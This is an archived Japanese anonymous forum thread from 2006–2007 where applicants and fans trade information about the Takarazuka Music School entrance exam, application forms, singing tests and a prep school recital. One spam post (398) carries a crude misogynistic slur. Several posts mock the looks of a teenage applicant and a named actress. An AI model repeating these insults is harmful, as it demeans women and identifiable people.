ただし、やっぱり欧米人のような外向きな骨格にはなりませんけど


385 :名無しさん@花束いっぱい。:2006/12/25(月) 08:41:30 ID:wxiti+C8
明日夢の発表会行く人いる?
予科本科も出るから音楽学校生やジェンヌが結構来るって。行きたいけどチケットなのかなあ?
情報求む。

386 :名無しさん@花束いっぱい。:2006/12/25(月) 13:42:36 ID:dpOgFLnV
バレエやってる人はO脚ばっかだよ
それかX脚ね   まっすぐの人なんてほとんどいない

387 :名無しさん@花束いっぱい。:2006/12/25(月) 22:00:01 ID:pJ5PZiLN
比較的まっすぐな脚をしています エックス脚がうらやましいです 

388 :名無しさん@花束いっぱい。:2006/12/25(月) 23:48:08 ID:n98nxFCL
えーなんでー 私X脚だけど、まっすぐな人がうらやましいですけど。


389 :名無しさん@花束いっぱい。:2006/12/26(火) 00:16:34 ID:P3ltyYp3
コールユーブンゲン五度音程って書いてあるけど五度音程までがでるってこと?
No3〜No30ぐらいから出題されるってことかな?


390 :名無しさん@花束いっぱい。:2006/12/26(火) 01:01:04 ID:7aoka/mT
じゃあI脚がいたらレアってことですね

391 :名無しさん@花束いっぱい。:2006/12/26(火) 08:34:59 ID:ill06ehz
真っ直ぐな脚ってI脚っていうの? I というより UかII でないのけ?
なんかI脚ってえと唐傘のお化けみたい。

392 :名無しさん@花束いっぱい。:2006/12/26(火) 21:38:12 ID:CwELdPzP
>388
エシャッペやアラベスクをするとき、X脚だと脚が反っててきれいだから。

393 :名無しさん@花束いっぱい。:2006/12/26(火) 22:41:30 ID:vovp5vCv
願書申し込んだのですが、1週間経っても届かないのは普通ですか?

394 :名無しさん@花束いっぱい。:2006/12/27(水) 01:47:01 ID:EbcAnlZ3
去年は一次でおちましたが今年は受かります!
あと3回しかチャンスがないんだから頑張ります!

395 :名無しさん@花束いっぱい。:2006/12/27(水) 02:25:35 ID:9oDrm/ck
3回 しか ってよくワカラン
2回切ってから使う言葉のような

396 :名無しさん@花束いっぱい。:2006/12/27(水) 04:53:57 ID:L2+klwW5
一回で諦めた方が良さそうなおばか…
おばかは、音校で、耐えられ無いだろうきっと!

397 :名無しさん@花束いっぱい。:2006/12/27(水) 23:06:03 ID:i9MnrVdj
ピアスってもちろんだめですよね。。

398 :名無しさん@花束いっぱい。:2006/12/28(木) 00:47:21 ID:sxVGim26
高学歴よ、非処女と結婚してはいけない ★第2膜
http://tmp6.2ch.net/test/read.cgi/joke/1167228552/

「非処女は肉便器」と書かれたTシャツを着て街を歩く俺は英雄

399 :名無しさん@花束いっぱい。:2006/12/28(木) 17:50:31 ID:DdmF0339
願書が届かない〜〜遅い〜

400 :名無しさん@花束いっぱい。:2006/12/29(金) 11:48:27 ID:u51HpCso
私も願書がまだ届きません。12月中旬に出したのですが、まだ届きません。
皆様は届いているのでしょうか?

401 :名無しさん@花束いっぱい。:2006/12/30(土) 12:08:47 ID:nvimD26a
課題曲は娘役は・・男役は・・ってものがあるのかな?
娘役にしたら可愛くないとか、男役にしたら可愛すぎるとか・・?

402 :名無しさん@花束いっぱい。:2007/01/01(月) 02:05:16 ID:gCj6M/9P
夢の発表会どうでした〜?
見に行かれた方いらっしゃいますか〜?
今年は有望な子がいるのでしょうか?

403 :名無しさん@花束いっぱい。:2007/01/04(木) 01:45:51 ID:eDLAtJS+
〉389
受験要項、ちゃんと読みなさい。5度音程程度、初見と書いてある。コールユーブンゲンが丸ごとは出ない。あくまで参考で、劇団の先生が作る。とりあえず1冊レッスンすれば良いと聞いた。頑張れ!

404 :名無しさん@花束いっぱい。:2007/01/04(木) 01:58:07 ID:eDLAtJS+
〉389

405 :名無しさん@花束いっぱい。:2007/01/04(木) 03:52:02 ID:Kn0eVLT2
>389 コールユブンゲンは、まるまる覚えたもの勝ちです!

406 :名無しさん@花束いっぱい。:2007/01/04(木) 10:28:23 ID:YTn8bmNU
ユメ、有望なコいるらしいです

407 :名無しさん@花束いっぱい。:2007/01/04(木) 13:09:36 ID:QOs301Ej
男役の子でしょ?清潔感があっていいと思った

408 :名無しさん@花束いっぱい。:2007/01/04(木) 15:05:40 ID:W3c9nqqY
そうなんだ…
前は娘役の高3のYさんが凄いって聞いた

409 :名無しさん@花束いっぱい。:2007/01/04(木) 22:50:18 ID:W7Oi5TQh
ゆめの発表会に出てた人よりロビーにいた他の受験生のが目立ってた

410 :名無しさん@花束いっぱい。:2007/01/04(木) 23:12:38 ID:tKo86Q+S
あのロビーにいた受験生みたいな集団って本科でしょ?夢の発表会に出てた本科の人と話してたし。発表会は受験生はみんなスタイル良くて頑張ってたと思うけど、やっぱり現役の本科生の子は別格でしたね。名前忘れちゃったけどこれから応援したいです。

411 :名無しさん@花束いっぱい。:2007/01/05(金) 06:59:55 ID:5/m4i5iJ
それは現役と受験生は違うよ。
レッスン量だってあっちの方が全然多いんだし
今回発表会はどんな内容だったの?

412 :名無しさん@花束いっぱい。:2007/01/06(土) 14:19:26 ID:L9d5Yplo
みんな頑張ってねー!
私は去年とうとう入れなかったけど…!
自分を信じて夢に向かって努力していた時期は自分の人生のなかで1番の思い出!!!
不安を打ち消すには努力しかないんだよ。
頑張ってね!!!!!

413 :名無しさん@花束いっぱい。:2007/01/07(日) 22:49:52 ID:0ZPqAEjV
ゆめ 今年は結構良かったよ。去年5人合格でしょ。今年もそのくらい行きそう。
娘役可愛い子いた。男役は人数少ない。でも主役は良かった。

414 :名無しさん@花束いっぱい。:2007/01/07(日) 22:52:41 ID:AVu0Cpe1
ゆめの発表会、二部良かったよー
最初のダンスとか…

415 :名無しさん@花束いっぱい。:2007/01/08(月) 01:04:07 ID:ApDD/s2I
細くて可愛い子いたぁ〜

416 :名無しさん@花束いっぱい。:2007/01/08(月) 03:38:02 ID:Mf9FeJ9l
Nさんじゃない?
去年の受験の時本科から人気あったコじゃない?

417 :名無しさん@花束いっぱい。:2007/01/08(月) 22:39:11 ID:S+ksK7ys
2部は何の役?主役はYさんでしょ?

418 :名無しさん@花束いっぱい。:2007/01/08(月) 23:21:46 ID:Mf9FeJ9l
貴婦人かな…


419 :名無しさん@花束いっぱい。:2007/01/09(火) 00:16:14 ID:jEkQntsk
そんな役有ったっけ?主役の姉妹とかじゃなくて?

420 :名無しさん@花束いっぱい。:2007/01/09(火) 08:21:09 ID:tNKvtJD8
なんか主役と騎士?
が戦ってる場面に泥棒とか貴婦人いたじゃん

421 :名無しさん@花束いっぱい。:2007/01/09(火) 11:04:57 ID:jEkQntsk
夢は去年2次通った子が4人いるって。
スクール探してる友達がプログラム見ながらいってたから間違いない。
主役級の子たちだって。

422 :名無しさん@花束いっぱい。:2007/01/09(火) 15:56:42 ID:IF+J8Z5I
スポーツ履歴とかって関係あるの?

423 :名無しさん@花束いっぱい。:2007/01/09(火) 17:00:27 ID:CbGPw1k2
受験2回目の子は前に書いたバレエ暦など、プラス今も習ってる期間だよね?

424 :名無しさん@花束いっぱい。:2007/01/09(火) 21:12:00 ID:IF+J8Z5I
当たり前じゃん…

425 :名無しさん@花束いっぱい。:2007/01/10(水) 18:03:24 ID:Jt30DpVw
>>412
私も一昨年で駄目で、大学に切り替えました…もしかしたら一緒に受けてたかもしれませんね。
また今年も受験シーズンになってきて、ちょっとまだ悲しいですが、花組も見に行きますしw応援したいですねー。

426 :名無しさん@花束いっぱい。:2007/01/10(水) 20:23:16 ID:C0WQv021
ゆめ有望な子多いね!
中3のHちゃんはどう?

427 :名無しさん@花束いっぱい。:2007/01/10(水) 20:47:49 ID:mehoDUOA
ラヴニールはどうですか?

私も、ゆめの中3のHちゃん気になる〜
かわいいの?

428 :名無しさん@花束いっぱい。:2007/01/10(水) 20:56:46 ID:UpXEOwH1
入学案内から「容姿端麗」が消えたのはいつ?

429 :名無しさん@花束いっぱい。:2007/01/10(水) 20:57:00 ID:C0WQv021
わかんないけど実力あるみたいだよ


430 :名無しさん@花束いっぱい。:2007/01/10(水) 22:20:41 ID:m6Q0EY3A
本人?ID一緒だよw根性はあるらしいけど顔とスタイルがね…

431 :名無しさん@花束いっぱい。:2007/01/10(水) 22:21:56 ID:m6Q0EY3A
↑本人?426とID一緒だよw根性はあるらしいけど顔とスタイルがね…

432 :名無しさん@花束いっぱい。:2007/01/10(水) 22:23:21 ID:m6Q0EY3A
↑本人?426とID一緒だよw受かる気満々らしいけど顔とスタイルがね…

433 :名無しさん@花束いっぱい。:2007/01/10(水) 22:24:14 ID:m6Q0EY3A
三回もすいません…

434 :名無しさん@花束いっぱい。:2007/01/10(水) 22:40:18 ID:C0WQv021
426だけど私がその子の知ってる事を言っただけ〜


435 :名無しさん@花束いっぱい。:2007/01/10(水) 22:50:58 ID:dxF1qcSA
わたしは大滝子さんに憧れてヅカを受験しました。

                白城あやか

436 :名無しさん@花束いっぱい。:2007/01/11(木) 00:12:41 ID:fpAkxsTo
容姿端麗は今でもあるよ。消えてないですよ

437 :名無しさん@花束いっぱい。:2007/01/11(木) 00:31:05 ID:Ja2+XzkR
ここ数年、化粧でごまかさないで素顔でも勝負できる美人で、尚且つ実力派っていう方がほっんとに少ないので、容姿端麗なみなさん、頑張って宝塚来て下さい(T-T)
雪の愛原さんみたいに、お金で阪急ポスター買うお金持ちのようなブーなお嬢様は方はお願いだからご遠慮下さい。



98 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)